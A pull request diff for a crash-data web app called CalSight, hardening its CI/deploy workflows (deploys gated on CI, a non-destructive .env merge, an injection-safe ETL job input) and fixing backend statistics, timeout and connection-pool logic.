### PR TITLE
Full project audit + remediation of critical/high findings

### DIFF
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -11,6 +11,13 @@ permissions:
   pull-requests: write
   security-events: write
 
+concurrency:
+  # Superseded pushes to the same branch/PR cancel the in-flight run. Safe for
+  # CI (nothing stateful gets interrupted), unlike deploy where it isn't. A
+  # cancelled main run never deploys — the newer commit's run deploys instead.
+  group: ${{ github.workflow }}-${{ github.ref }}
+  cancel-in-progress: true
+
 jobs:
   backend:
     runs-on: ubuntu-latest

--- a/.github/workflows/deploy.yml
+++ b/.github/workflows/deploy.yml
@@ -1,18 +1,36 @@
 name: Deploy to Production
 
+# Deploys are gated on CI: this fires when the "CI" workflow finishes, and the
+# jobs below only run if that CI run succeeded on main. A push to main
+# therefore deploys only after its CI run goes green — nothing deploys for
+# failed or cancelled CI runs (including runs superseded by CI's
+# cancel-in-progress; the newer commit's run deploys instead).
 on:
-  push:
-    branches: [main]
+  workflow_run:
+    workflows: [CI]
+    types: [completed]
 
 concurrency:
   group: production-deploy
-  cancel-in-progress: true
+  # Queue deploys instead of cancelling in-flight ones — killing a deploy
+  # mid-run can interrupt a live database migration.
+  cancel-in-progress: false
 
 permissions:
   contents: read
 
+env:
+  # The commit being deployed. For workflow_run events github.sha is the
+  # default-branch head at trigger time — which can already be NEWER than the
+  # commit CI validated — so use the SHA the CI run actually ran on. The
+  # github.sha fallback only applies if another trigger (e.g.
+  # workflow_dispatch) is ever added.
+  DEPLOY_SHA: ${{ github.event.workflow_run.head_sha || github.sha }}
+
 jobs:
   check-backfill:
+    # Only deploy commits whose CI run succeeded on main.
+    if: github.event.workflow_run.conclusion == 'success' && github.event.workflow_run.head_branch == 'main'
     runs-on: self-hosted
     outputs:
       needed: ${{ steps.check.outputs.needed }}
@@ -21,6 +39,9 @@ jobs:
         with:
           persist-credentials: false
           fetch-depth: 2
+          # Check out the CI-validated commit, not the default-branch head
+          # (which workflow_run would otherwise give us).
+          ref: ${{ env.DEPLOY_SHA }}
       - name: Detect migration/backfill changes or [backfill] tag
         id: check
         run: |
@@ -39,12 +60,17 @@ jobs:
           echo "needed=$NEEDED" >> $GITHUB_OUTPUT
 
   deploy:
+    # Redundant with the check-backfill guard (a skipped `needs` job skips this
+    # one too), but explicit so the gate survives future refactors.
+    if: github.event.workflow_run.conclusion == 'success' && github.event.workflow_run.head_branch == 'main'
     needs: check-backfill
     runs-on: self-hosted
     steps:
       - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2
         with:
           persist-credentials: false
+          # Same as check-backfill: deploy the CI-validated commit.
+          ref: ${{ env.DEPLOY_SHA }}
 
       - name: Force HTTPS for git (no SSH keys needed)
         run: |
@@ -113,10 +139,21 @@ jobs:
 
       - name: Tag images with commit SHA for rollback
         run: |
-          docker tag calsight-backend:latest calsight-backend:${{ github.sha }}
+          docker tag calsight-backend:latest "calsight-backend:${DEPLOY_SHA}"
 
-      - name: Prune old images (keep last 5)
-        run: docker image prune -f --filter "until=168h"
+      - name: Prune old images (keep last 5 SHA tags)
+        run: |
+          # `docker image prune` only removes dangling images, so SHA-tagged
+          # rollback images accumulate forever. Instead keep the 5 newest SHA
+          # tags (docker images lists newest first) and remove the rest —
+          # never :latest, and never the SHA we just deployed.
+          docker images calsight-backend --format '{{.Tag}}' \
+            | grep -v '^latest$' \
+            | tail -n +6 \
+            | grep -v "^${DEPLOY_SHA}$" \
+            | while read -r TAG; do
+                docker rmi "calsight-backend:${TAG}" || true
+              done
 
       - name: Backfill derived fields (severity, flags, driver age, canonical cause)
         if: needs.check-backfill.outputs.needed == 'true'
@@ -160,8 +197,10 @@ jobs:
         if: failure()
         run: |
           echo "Deploy failed — attempting rollback..."
-          PREV_SHA=$(docker images calsight-backend --format '{{.Tag}}' | grep -v latest | head -1)
-          if [ -n "$PREV_SHA" ] && [ "$PREV_SHA" != "${{ github.sha }}" ]; then
+          # The just-deployed SHA is tagged before the health check, so it is
+          # the newest tag — skip it (and :latest) to find the previous deploy.
+          PREV_SHA=$(docker images calsight-backend --format '{{.Tag}}' | grep -v -e '^latest$' -e "^${DEPLOY_SHA}$" | head -1)
+          if [ -n "$PREV_SHA" ]; then
             echo "Rolling back to calsight-backend:$PREV_SHA"
             docker tag calsight-backend:$PREV_SHA calsight-backend:latest
             docker compose -f docker-compose.prod.yml up -d backend
@@ -186,11 +225,13 @@ jobs:
         env:
           DISCORD_WEBHOOK_URL: ${{ secrets.DISCORD_WEBHOOK_URL }}
           GH_STATUS: ${{ job.status }}
-          GH_SHA: ${{ github.sha }}
-          GH_MSG: ${{ github.event.head_commit.message }}
+          GH_SHA: ${{ env.DEPLOY_SHA }}
+          # workflow_run events carry the commit info under workflow_run.*;
+          # head_commit/ref_name describe the triggering event, not the deploy.
+          GH_MSG: ${{ github.event.workflow_run.head_commit.message || github.event.head_commit.message }}
           GH_REPO: ${{ github.repository }}
           GH_RUN_ID: ${{ github.run_id }}
-          GH_BRANCH: ${{ github.ref_name }}
+          GH_BRANCH: ${{ github.event.workflow_run.head_branch || github.ref_name }}
           GH_ACTOR: ${{ github.actor }}
           DISK: ${{ env.DISK }}
         run: |

--- a/.github/workflows/deploy.yml
+++ b/.github/workflows/deploy.yml
@@ -91,28 +91,63 @@ jobs:
           CEREBRAS_KEY: ${{ secrets.CEREBRAS_API_KEY }}
           SENTRY: ${{ secrets.SENTRY_DSN }}
         run: |
-          : > backend/.env
-          printf 'DATABASE_URL=%s\n' "$DB_URL" >> backend/.env
-          printf 'CORS_ORIGINS=%s\n' "$CORS" >> backend/.env
-          printf 'CENSUS_API_KEY=%s\n' "$CENSUS" >> backend/.env
-          printf 'NOAA_API_TOKEN=%s\n' "$NOAA" >> backend/.env
-          printf 'BLS_API_KEY=%s\n' "$BLS" >> backend/.env
-          printf 'LLM_PROVIDER=groq\n' >> backend/.env
-          printf 'LLM_API_KEY=%s\n' "$GROQ_KEY" >> backend/.env
-          printf 'LLM_API_KEY_2=%s\n' "$GROQ_KEY_2" >> backend/.env
-          printf 'LLM_FALLBACK_1_PROVIDER=gemini\n' >> backend/.env
-          printf 'LLM_FALLBACK_1_KEY=%s\n' "$GEMINI_KEY" >> backend/.env
-          printf 'LLM_FALLBACK_2_PROVIDER=openrouter\n' >> backend/.env
-          printf 'LLM_FALLBACK_2_KEY=%s\n' "$OPENROUTER_KEY" >> backend/.env
-          printf 'LLM_FALLBACK_3_PROVIDER=cerebras\n' >> backend/.env
-          printf 'LLM_FALLBACK_3_KEY=%s\n' "$CEREBRAS_KEY" >> backend/.env
-          printf 'DEBUG=false\n' >> backend/.env
+          # Non-destructive write: operators set keys the workflow does NOT
+          # manage (HEARTBEAT_URL, R2_*, DISCORD_BACKUP_WEBHOOK, ETL_API_KEY,
+          # ALERT_WEBHOOK_URL, MAINTENANCE_MODE, ETL_DATABASE_URL, ...)
+          # directly in backend/.env on the runner. The old `: > backend/.env`
+          # truncation wiped them on every deploy — that is exactly how
+          # SENTRY_DSN was silently lost before it became a managed key — so
+          # write the managed keys to a temp file, carry over every unmanaged
+          # line from the existing file, then swap the merged file into place.
+          TMP_ENV=$(mktemp backend/.env.XXXXXX)
+          printf 'DATABASE_URL=%s\n' "$DB_URL" >> "$TMP_ENV"
+          printf 'CORS_ORIGINS=%s\n' "$CORS" >> "$TMP_ENV"
+          printf 'CENSUS_API_KEY=%s\n' "$CENSUS" >> "$TMP_ENV"
+          printf 'NOAA_API_TOKEN=%s\n' "$NOAA" >> "$TMP_ENV"
+          printf 'BLS_API_KEY=%s\n' "$BLS" >> "$TMP_ENV"
+          printf 'LLM_PROVIDER=groq\n' >> "$TMP_ENV"
+          printf 'LLM_API_KEY=%s\n' "$GROQ_KEY" >> "$TMP_ENV"
+          printf 'LLM_API_KEY_2=%s\n' "$GROQ_KEY_2" >> "$TMP_ENV"
+          printf 'LLM_FALLBACK_1_PROVIDER=gemini\n' >> "$TMP_ENV"
+          printf 'LLM_FALLBACK_1_KEY=%s\n' "$GEMINI_KEY" >> "$TMP_ENV"
+          printf 'LLM_FALLBACK_2_PROVIDER=openrouter\n' >> "$TMP_ENV"
+          printf 'LLM_FALLBACK_2_KEY=%s\n' "$OPENROUTER_KEY" >> "$TMP_ENV"
+          printf 'LLM_FALLBACK_3_PROVIDER=cerebras\n' >> "$TMP_ENV"
+          printf 'LLM_FALLBACK_3_KEY=%s\n' "$CEREBRAS_KEY" >> "$TMP_ENV"
+          printf 'DEBUG=false\n' >> "$TMP_ENV"
           # Sentry error monitoring for the API container. No-op until the
           # SENTRY_DSN repo secret is set (main.py gates on a non-empty DSN),
-          # so this is safe to ship before the secret exists. Without this line
-          # the deploy's `: > backend/.env` truncation wiped SENTRY_DSN every
-          # deploy, which is why backend error monitoring never activated.
-          printf 'SENTRY_DSN=%s\n' "$SENTRY" >> backend/.env
+          # so this is safe to ship before the secret exists.
+          printf 'SENTRY_DSN=%s\n' "$SENTRY" >> "$TMP_ENV"
+          # Keys this workflow owns — must match the printf list above exactly.
+          MANAGED='DATABASE_URL CORS_ORIGINS CENSUS_API_KEY NOAA_API_TOKEN BLS_API_KEY LLM_PROVIDER LLM_API_KEY LLM_API_KEY_2 LLM_FALLBACK_1_PROVIDER LLM_FALLBACK_1_KEY LLM_FALLBACK_2_PROVIDER LLM_FALLBACK_2_KEY LLM_FALLBACK_3_PROVIDER LLM_FALLBACK_3_KEY DEBUG SENTRY_DSN'
+          if [ -f backend/.env ]; then
+            SEEN=" $MANAGED "
+            while IFS= read -r LINE || [ -n "$LINE" ]; do
+              case "$LINE" in
+                ''|'#'*)
+                  # Preserve comments and blank lines as-is.
+                  printf '%s\n' "$LINE" >> "$TMP_ENV"
+                  continue
+                  ;;
+                *=*)
+                  KEY=${LINE%%=*}
+                  ;;
+                *)
+                  printf '%s\n' "$LINE" >> "$TMP_ENV"
+                  continue
+                  ;;
+              esac
+              case "$SEEN" in
+                *" $KEY "*) ;;  # managed key or duplicate: drop the stale line
+                *)
+                  printf '%s\n' "$LINE" >> "$TMP_ENV"
+                  SEEN="$SEEN$KEY "
+                  ;;
+              esac
+            done < backend/.env
+          fi
+          mv "$TMP_ENV" backend/.env
 
       - name: Stop standalone cloudflared (if still running as systemd)
         run: systemctl disable --now cloudflared 2>/dev/null || true
@@ -125,17 +160,25 @@ jobs:
       - name: Build images (without starting)
         env:
           CLOUDFLARED_TOKEN: ${{ secrets.CLOUDFLARED_TOKEN }}
-        run: docker compose -f docker-compose.prod.yml build
+        # Include docker-compose.pipeline.yml: the pipeline service builds its
+        # own image (calsight-pipeline) from ./backend, so building only the
+        # prod file would leave it on a stale image.
+        run: docker compose -f docker-compose.prod.yml -f docker-compose.pipeline.yml build
 
       - name: Run database migrations (before serving traffic)
         env:
           CLOUDFLARED_TOKEN: ${{ secrets.CLOUDFLARED_TOKEN }}
         run: docker compose -f docker-compose.prod.yml run --rm -T backend alembic upgrade head
 
-      - name: Start backend + tunnel
+      - name: Start backend + tunnel + ETL pipeline
         env:
           CLOUDFLARED_TOKEN: ${{ secrets.CLOUDFLARED_TOKEN }}
-        run: docker compose -f docker-compose.prod.yml up -d
+        # Both files, matching how the stack runs in prod (see
+        # docker-compose.pipeline.yml). Without the pipeline file here the
+        # pipeline container kept running the previous deploy's image forever.
+        # `up -d` recreates it on the freshly built image, and also starts it
+        # if it isn't running yet (first deploy).
+        run: docker compose -f docker-compose.prod.yml -f docker-compose.pipeline.yml up -d
 
       - name: Tag images with commit SHA for rollback
         run: |

--- a/.github/workflows/run-etl.yml
+++ b/.github/workflows/run-etl.yml
@@ -71,23 +71,59 @@ jobs:
           CEREBRAS_KEY: ${{ secrets.CEREBRAS_API_KEY }}
           SENTRY: ${{ secrets.SENTRY_DSN }}
         run: |
-          : > backend/.env
-          printf 'DATABASE_URL=%s\n' "$DB_URL" >> backend/.env
-          printf 'CORS_ORIGINS=%s\n' "$CORS" >> backend/.env
-          printf 'CENSUS_API_KEY=%s\n' "$CENSUS" >> backend/.env
-          printf 'NOAA_API_TOKEN=%s\n' "$NOAA" >> backend/.env
-          printf 'BLS_API_KEY=%s\n' "$BLS" >> backend/.env
-          printf 'LLM_PROVIDER=groq\n' >> backend/.env
-          printf 'LLM_API_KEY=%s\n' "$GROQ_KEY" >> backend/.env
-          printf 'LLM_API_KEY_2=%s\n' "$GROQ_KEY_2" >> backend/.env
-          printf 'LLM_FALLBACK_1_PROVIDER=gemini\n' >> backend/.env
-          printf 'LLM_FALLBACK_1_KEY=%s\n' "$GEMINI_KEY" >> backend/.env
-          printf 'LLM_FALLBACK_2_PROVIDER=openrouter\n' >> backend/.env
-          printf 'LLM_FALLBACK_2_KEY=%s\n' "$OPENROUTER_KEY" >> backend/.env
-          printf 'LLM_FALLBACK_3_PROVIDER=cerebras\n' >> backend/.env
-          printf 'LLM_FALLBACK_3_KEY=%s\n' "$CEREBRAS_KEY" >> backend/.env
-          printf 'DEBUG=false\n' >> backend/.env
-          printf 'SENTRY_DSN=%s\n' "$SENTRY" >> backend/.env
+          # Non-destructive write (kept in sync with deploy.yml): operators set
+          # keys the workflow does NOT manage (HEARTBEAT_URL, R2_*,
+          # DISCORD_BACKUP_WEBHOOK, ETL_API_KEY, ALERT_WEBHOOK_URL,
+          # MAINTENANCE_MODE, ETL_DATABASE_URL, ...) directly in backend/.env
+          # on the runner. Truncating the file wiped them on every run, so
+          # write the managed keys to a temp file, carry over every unmanaged
+          # line from the existing file, then swap the merged file into place.
+          TMP_ENV=$(mktemp backend/.env.XXXXXX)
+          printf 'DATABASE_URL=%s\n' "$DB_URL" >> "$TMP_ENV"
+          printf 'CORS_ORIGINS=%s\n' "$CORS" >> "$TMP_ENV"
+          printf 'CENSUS_API_KEY=%s\n' "$CENSUS" >> "$TMP_ENV"
+          printf 'NOAA_API_TOKEN=%s\n' "$NOAA" >> "$TMP_ENV"
+          printf 'BLS_API_KEY=%s\n' "$BLS" >> "$TMP_ENV"
+          printf 'LLM_PROVIDER=groq\n' >> "$TMP_ENV"
+          printf 'LLM_API_KEY=%s\n' "$GROQ_KEY" >> "$TMP_ENV"
+          printf 'LLM_API_KEY_2=%s\n' "$GROQ_KEY_2" >> "$TMP_ENV"
+          printf 'LLM_FALLBACK_1_PROVIDER=gemini\n' >> "$TMP_ENV"
+          printf 'LLM_FALLBACK_1_KEY=%s\n' "$GEMINI_KEY" >> "$TMP_ENV"
+          printf 'LLM_FALLBACK_2_PROVIDER=openrouter\n' >> "$TMP_ENV"
+          printf 'LLM_FALLBACK_2_KEY=%s\n' "$OPENROUTER_KEY" >> "$TMP_ENV"
+          printf 'LLM_FALLBACK_3_PROVIDER=cerebras\n' >> "$TMP_ENV"
+          printf 'LLM_FALLBACK_3_KEY=%s\n' "$CEREBRAS_KEY" >> "$TMP_ENV"
+          printf 'DEBUG=false\n' >> "$TMP_ENV"
+          printf 'SENTRY_DSN=%s\n' "$SENTRY" >> "$TMP_ENV"
+          # Keys this workflow owns — must match the printf list above exactly.
+          MANAGED='DATABASE_URL CORS_ORIGINS CENSUS_API_KEY NOAA_API_TOKEN BLS_API_KEY LLM_PROVIDER LLM_API_KEY LLM_API_KEY_2 LLM_FALLBACK_1_PROVIDER LLM_FALLBACK_1_KEY LLM_FALLBACK_2_PROVIDER LLM_FALLBACK_2_KEY LLM_FALLBACK_3_PROVIDER LLM_FALLBACK_3_KEY DEBUG SENTRY_DSN'
+          if [ -f backend/.env ]; then
+            SEEN=" $MANAGED "
+            while IFS= read -r LINE || [ -n "$LINE" ]; do
+              case "$LINE" in
+                ''|'#'*)
+                  # Preserve comments and blank lines as-is.
+                  printf '%s\n' "$LINE" >> "$TMP_ENV"
+                  continue
+                  ;;
+                *=*)
+                  KEY=${LINE%%=*}
+                  ;;
+                *)
+                  printf '%s\n' "$LINE" >> "$TMP_ENV"
+                  continue
+                  ;;
+              esac
+              case "$SEEN" in
+                *" $KEY "*) ;;  # managed key or duplicate: drop the stale line
+                *)
+                  printf '%s\n' "$LINE" >> "$TMP_ENV"
+                  SEEN="$SEEN$KEY "
+                  ;;
+              esac
+            done < backend/.env
+          fi
+          mv "$TMP_ENV" backend/.env
 
       - name: Run ETL job (${{ inputs.job }})
         run: docker compose -f docker-compose.prod.yml exec -T backend python -m "etl.$JOB"

--- a/.github/workflows/run-etl.yml
+++ b/.github/workflows/run-etl.yml
@@ -28,10 +28,26 @@ concurrency:
   group: run-etl
   cancel-in-progress: false
 
+permissions:
+  contents: read
+
 jobs:
   run-etl:
     runs-on: self-hosted
+    env:
+      # Never interpolate inputs.job directly into a `run:` line — the
+      # expression expands before the shell parses the command, which is a
+      # shell-injection vector. Pass it through the environment instead and
+      # validate it below before anything else runs.
+      JOB: ${{ inputs.job }}
     steps:
+      - name: Validate job input
+        run: |
+          if ! printf '%s' "$JOB" | grep -Eq '^[a-z0-9_]+$'; then
+            echo "Invalid job input (must match ^[a-z0-9_]+\$): $JOB" >&2
+            exit 1
+          fi
+
       - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2
         with:
           persist-credentials: false
@@ -74,7 +90,7 @@ jobs:
           printf 'SENTRY_DSN=%s\n' "$SENTRY" >> backend/.env
 
       - name: Run ETL job (${{ inputs.job }})
-        run: docker compose -f docker-compose.prod.yml exec -T backend python -m "etl.${{ inputs.job }}"
+        run: docker compose -f docker-compose.prod.yml exec -T backend python -m "etl.$JOB"
         timeout-minutes: 240
 
       - name: Refresh materialized views

--- a/backend/Dockerfile
+++ b/backend/Dockerfile
@@ -1,20 +1,18 @@
-FROM python:3.12-slim
+# Pin to Debian 13 (trixie) explicitly. The floating `python:3.12-slim` tag
+# already moved bookworm -> trixie, which is what broke the previous PGDG
+# pin (its bookworm libpq5 wants libldap-2.5, absent on trixie). Pinning the
+# codename keeps the base from shifting under us again.
+FROM python:3.12-slim-trixie
 
 WORKDIR /app
 
-# pg_dump must match the server's major version (17) — Debian bookworm's
-# postgresql-client is v15, which refuses to dump a newer server. Pull the
-# client from the PGDG repo instead. apt runs in its own layer, before the
-# requirements COPY, so a dependency bump doesn't re-run it.
+# pg_dump must match the server's major version (17) so it can dump it —
+# an older client refuses a newer server. Debian 13 (trixie) ships
+# postgresql-client-17 in its own repos, so no PGDG repo is needed. apt runs
+# in its own layer, before the requirements COPY, so a dependency bump
+# doesn't re-run it.
 RUN apt-get update \
-    && apt-get install -y --no-install-recommends curl ca-certificates \
-    && install -d /usr/share/postgresql-common/pgdg \
-    && curl -fsSL https://www.postgresql.org/media/keys/ACCC4CF8.asc \
-        -o /usr/share/postgresql-common/pgdg/apt.postgresql.org.asc \
-    && echo "deb [signed-by=/usr/share/postgresql-common/pgdg/apt.postgresql.org.asc] http://apt.postgresql.org/pub/repos/apt bookworm-pgdg main" \
-        > /etc/apt/sources.list.d/pgdg.list \
-    && apt-get update \
-    && apt-get install -y --no-install-recommends postgresql-client-17 \
+    && apt-get install -y --no-install-recommends curl ca-certificates postgresql-client-17 \
     && rm -rf /var/lib/apt/lists/*
 
 COPY requirements.txt .

--- a/backend/Dockerfile
+++ b/backend/Dockerfile
@@ -2,11 +2,23 @@ FROM python:3.12-slim
 
 WORKDIR /app
 
-COPY requirements.txt .
-RUN pip install --no-cache-dir -r requirements.txt \
+# pg_dump must match the server's major version (17) — Debian bookworm's
+# postgresql-client is v15, which refuses to dump a newer server. Pull the
+# client from the PGDG repo instead. apt runs in its own layer, before the
+# requirements COPY, so a dependency bump doesn't re-run it.
+RUN apt-get update \
+    && apt-get install -y --no-install-recommends curl ca-certificates \
+    && install -d /usr/share/postgresql-common/pgdg \
+    && curl -fsSL https://www.postgresql.org/media/keys/ACCC4CF8.asc \
+        -o /usr/share/postgresql-common/pgdg/apt.postgresql.org.asc \
+    && echo "deb [signed-by=/usr/share/postgresql-common/pgdg/apt.postgresql.org.asc] http://apt.postgresql.org/pub/repos/apt bookworm-pgdg main" \
+        > /etc/apt/sources.list.d/pgdg.list \
     && apt-get update \
-    && apt-get install -y --no-install-recommends curl postgresql-client \
+    && apt-get install -y --no-install-recommends postgresql-client-17 \
     && rm -rf /var/lib/apt/lists/*
+
+COPY requirements.txt .
+RUN pip install --no-cache-dir -r requirements.txt
 
 COPY . .
 

--- a/backend/app/ai_tools.py
+++ b/backend/app/ai_tools.py
@@ -119,8 +119,12 @@ def query_crashes(
     preds = []
     if county:
         code = _county_code(db, county)
-        if code is not None:
-            preds.append(Crash.county_code == code)
+        if code is None:
+            # Never silently drop the filter: an unresolvable county would
+            # return the 11M-row statewide total, which the model then
+            # confidently cites as the county figure.
+            return [{"error": f"County not found: {county}"}]
+        preds.append(Crash.county_code == code)
     if years:
         preds.append(Crash.crash_year.in_(years))
     if severity:
@@ -356,8 +360,11 @@ def get_trend(
     preds = []
     if county:
         code = _county_code(db, county)
-        if code is not None:
-            preds.append(Crash.county_code == code)
+        if code is None:
+            # Same as query_crashes: dropping the filter would present
+            # statewide numbers as the county's trend.
+            return [{"error": f"County not found: {county}"}]
+        preds.append(Crash.county_code == code)
     if year_start:
         preds.append(Crash.crash_year >= year_start)
     if year_end:
@@ -784,12 +791,13 @@ def get_crash_rate(
     """Get crash rates per capita, per licensed driver, and per vehicle for a county."""
     code = _county_code(db, county)
     if not code:
-        return None
+        return {"error": f"County not found: {county}"}
 
     crash_q = db.query(
         func.count(Crash.id).label("total_crashes"),
         func.sum(Crash.number_killed).label("total_killed"),
         func.sum(Crash.number_injured).label("total_injured"),
+        func.count(func.distinct(Crash.crash_year)).label("years_covered"),
     ).filter(Crash.county_code == code)
     if years:
         crash_q = crash_q.filter(Crash.crash_year.in_(years))
@@ -807,23 +815,33 @@ def get_crash_rate(
     ).order_by(VehicleRegistration.year.desc()).first()
     vehicles = vr[0] if vr else None
 
+    # The denominators (population, drivers, vehicles) are single-year
+    # figures, so normalize the numerator to an annual average. Without
+    # this, an unrestricted query divides ~25 years of crashes by one
+    # year's population and reports a rate inflated ~25x.
+    years_covered = crash_row.years_covered or 1
+    crashes_per_year = crash_row.total_crashes / years_covered
+    killed_per_year = int(crash_row.total_killed or 0) / years_covered
+
     result = {
         "county": county,
         "total_crashes": crash_row.total_crashes,
         "total_killed": int(crash_row.total_killed or 0),
         "total_injured": int(crash_row.total_injured or 0),
+        "years_covered": years_covered,
+        "rate_basis": f"annual average over {years_covered} year(s) of crash data",
         "population": pop,
         "licensed_drivers": drivers,
         "registered_vehicles": vehicles,
     }
 
     if pop and pop > 0:
-        result["crashes_per_100k_pop"] = round(crash_row.total_crashes / pop * 100_000, 1)
-        result["fatalities_per_100k_pop"] = round(int(crash_row.total_killed or 0) / pop * 100_000, 1)
+        result["crashes_per_100k_pop"] = round(crashes_per_year / pop * 100_000, 1)
+        result["fatalities_per_100k_pop"] = round(killed_per_year / pop * 100_000, 1)
     if drivers and drivers > 0:
-        result["crashes_per_10k_drivers"] = round(crash_row.total_crashes / drivers * 10_000, 1)
+        result["crashes_per_10k_drivers"] = round(crashes_per_year / drivers * 10_000, 1)
     if vehicles and vehicles > 0:
-        result["crashes_per_10k_vehicles"] = round(crash_row.total_crashes / vehicles * 10_000, 1)
+        result["crashes_per_10k_vehicles"] = round(crashes_per_year / vehicles * 10_000, 1)
     if crash_row.total_crashes > 0:
         result["fatality_rate_pct"] = round(int(crash_row.total_killed or 0) / crash_row.total_crashes * 100, 2)
         result["injury_rate_pct"] = round(int(crash_row.total_injured or 0) / crash_row.total_crashes * 100, 2)

--- a/backend/app/database.py
+++ b/backend/app/database.py
@@ -8,8 +8,10 @@ from app.settings import settings
 # request load — every router shares this pool via get_db().
 engine = create_engine(
     settings.effective_database_url,
-    pool_size=20,
-    max_overflow=20,
+    # Per-worker pool — see settings.db_pool_size for the sizing math
+    # against the server's max_connections.
+    pool_size=settings.db_pool_size,
+    max_overflow=settings.db_max_overflow,
     pool_recycle=3600,
     pool_pre_ping=True,
 )

--- a/backend/app/routers/ask.py
+++ b/backend/app/routers/ask.py
@@ -6,6 +6,7 @@ import asyncio
 import json
 import logging
 import re
+import time
 from typing import Any
 
 from fastapi import APIRouter, Depends, Request, Response
@@ -23,7 +24,7 @@ from app.ai_prompt import (
     build_quick_facts,
 )
 from app.ai_tools import TOOL_REGISTRY, query_crashes
-from app.database import get_db
+from app.database import SessionLocal, get_db
 from app.llm_cache import get_ask_cache, make_cache_key
 from app.models import ChatFeedback
 from app.llm import (
@@ -40,6 +41,11 @@ limiter = Limiter(key_func=get_remote_address)
 _MAX_TOOL_ROUNDS = 3
 _MAX_TOOL_CALLS_PER_ROUND = 3
 _MAX_HISTORY = 10
+_ASK_TIMEOUT_SECONDS = 60.0
+
+
+class _AskAbandoned(Exception):
+    """The HTTP request already timed out; stop burning LLM quota."""
 
 
 class HistoryMessage(BaseModel):
@@ -125,7 +131,6 @@ async def ask(
     request: Request,
     response: Response,
     body: AskRequest,
-    db: Session = Depends(get_db),
 ):
     # Cache lookup happens before the LLM round trip — identical
     # (question, filters, history) produce the same answer, and the LLM
@@ -138,12 +143,19 @@ async def ask(
         response.headers["X-Cache"] = "HIT"
         return cached
 
+    # _handle_ask runs on a worker thread that can outlive this request
+    # (wait_for gives up, the thread keeps going). The thread owns its DB
+    # session — borrowing the request-scoped one would let FastAPI's
+    # teardown close it mid-query on timeout and hand the underlying
+    # connection back to the pool while the thread is still using it.
     try:
         result = await asyncio.wait_for(
-            asyncio.to_thread(_handle_ask, body, db),
-            timeout=60.0,
+            asyncio.to_thread(_handle_ask, body),
+            timeout=_ASK_TIMEOUT_SECONDS,
         )
     except asyncio.TimeoutError:
+        result = None
+    if result is None:
         return JSONResponse(
             status_code=504,
             content={"message": "Request timed out. Please try again.", "retry_after": 5},
@@ -154,7 +166,19 @@ async def ask(
     return result
 
 
-def _handle_ask(body: AskRequest, db: Session) -> AskResponse:
+def _handle_ask(body: AskRequest) -> AskResponse | None:
+    deadline = time.monotonic() + _ASK_TIMEOUT_SECONDS
+    db = SessionLocal()
+    try:
+        return _handle_ask_inner(body, db, deadline)
+    except _AskAbandoned:
+        logger.warning("Ask request abandoned after timeout; stopped tool loop early")
+        return None
+    finally:
+        db.close()
+
+
+def _handle_ask_inner(body: AskRequest, db: Session, deadline: float) -> AskResponse:
     filters_summary = build_filters_summary(body.filters)
     # Quick Facts pre-queries the totals/severity-split for the active filters
     # and injects them into the system prompt. Saves a tool call for basic
@@ -176,7 +200,7 @@ def _handle_ask(body: AskRequest, db: Session) -> AskResponse:
     tools_called: list[str] = []
 
     try:
-        answer, provider = _run_with_tools(db, messages, tools_called)
+        answer, provider = _run_with_tools(db, messages, tools_called, deadline)
     except AllProvidersExhausted:
         answer, provider = _run_simple_mode(db, body.filters, messages)
 
@@ -199,6 +223,7 @@ def _run_with_tools(
     db: Session,
     messages: list[dict],
     tools_called: list[str],
+    deadline: float,
 ) -> tuple[str, str]:
     """Run the tool-calling loop (max 3 rounds).
 
@@ -207,6 +232,10 @@ def _run_with_tools(
     """
     provider = "unknown"
     for round_num in range(_MAX_TOOL_ROUNDS):
+        # The client got its 504 once the deadline passed — every further
+        # LLM round would burn provider quota for an answer nobody reads.
+        if time.monotonic() >= deadline:
+            raise _AskAbandoned()
         tc = "required" if round_num == 0 else "auto"
         response, provider = generate_with_fallback(
             messages=messages,

--- a/backend/app/routers/stats.py
+++ b/backend/app/routers/stats.py
@@ -302,6 +302,15 @@ def _run_group_query(
             "those views don't carry canonical_cause.",
         )
 
+    if group_by == "rate" and causes:
+        # mv_crash_rates carries no canonical_cause; silently dropping the
+        # filter would return unfiltered rates presented as filtered.
+        raise FilterError(
+            "cause",
+            "cause filter is not supported with group_by=rate — per-capita "
+            "rates are precomputed without cause breakdowns.",
+        )
+
     view = _pick_view(group_by, has_cause_filter=bool(causes))
 
     # When involvement/condition filters or condition group_by values are

--- a/backend/app/settings.py
+++ b/backend/app/settings.py
@@ -50,6 +50,15 @@ class Settings(BaseSettings):
     etl_database_url: str = ""
     etl_database_url_azure: str = ""
 
+    # -- Connection pool (per gunicorn worker) --
+    # The pool is per-process: gunicorn runs 4 workers, so the server sees
+    # 4 × (pool_size + max_overflow) connections at peak. Keep the product
+    # comfortably under the Postgres max_connections (~100 on the current
+    # tier) with headroom for the ETL engine and psql sessions.
+    # 4 × (5 + 5) = 40 peak, versus 160 with the old 20/20 defaults.
+    db_pool_size: int = 5
+    db_max_overflow: int = 5
+
     # -- CORS --
     # Comma-separated origins, e.g. "http://localhost:5173,https://calsight.example.com"
     cors_origins: str = "http://localhost:5173"

--- a/backend/etl/backup.py
+++ b/backend/etl/backup.py
@@ -55,7 +55,7 @@ logging.basicConfig(
 )
 logger = logging.getLogger(__name__)
 
-DEFAULT_BACKUP_DIR = "/opt/calsight/backups"
+DEFAULT_BACKUP_DIR = os.environ.get("BACKUP_DIR", "/opt/calsight/backups")
 RETENTION_DAYS = 7
 # Always retain at least this many of the most-recent dumps regardless of age,
 # so a run of failed pg_dumps can never rotate away every recovery point.
@@ -264,8 +264,8 @@ def run_backup(backup_dir: str = DEFAULT_BACKUP_DIR) -> Path | None:
             filename, size_mb, elapsed,
         )
 
-        upload_to_r2(filepath)
-
+        # Offsite upload is the caller's job (main(), pipeline.run_backup) —
+        # doing it here too meant every scheduled run uploaded twice.
         return filepath
 
     except FileNotFoundError:

--- a/backend/etl/jobs.py
+++ b/backend/etl/jobs.py
@@ -16,7 +16,9 @@ def build_default_registry() -> JobRegistry:
     registry.register(Job(
         name="crashes_ccrs",
         module="etl.load_crashes",
-        args=["--start", "2016", "--end", "2026", "--source", "ccrs"],
+        # No --end: the module default (current year + 1) auto-advances,
+        # so new calendar years don't need a manual edit here.
+        args=["--start", "2016", "--source", "ccrs"],
         schedule="daily",
         table_name="crashes",
